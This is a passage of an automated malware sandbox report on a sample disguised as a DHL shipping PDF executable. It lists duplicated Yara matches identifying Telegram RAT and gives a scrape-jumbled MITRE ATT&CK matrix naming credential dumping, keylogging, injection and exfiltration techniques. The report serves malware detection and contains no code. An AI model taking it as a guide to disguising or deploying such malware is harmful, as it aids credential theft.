                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		111
                  Process Injection                  		1
                  Masquerading                  		1
                  OS Credential Dumping                  		1
                  Security Software Discovery                  		Remote Services1
                  Email Collection                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  Input Capture                  		1
                  Process Discovery                  		Remote Desktop Protocol1
                  Input Capture                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                  Virtualization/Sandbox Evasion                  		Security Account Manager31
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin Shares11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object Model1
                  Data from Local System                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information                  		LSA Secrets1
                  System Network Configuration Discovery                  		SSHKeylogging14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                  Obfuscated Files or Information                  		Cached Domain Credentials13
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                  Software Packing                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Timestomp                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  DLL Side-Loading                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.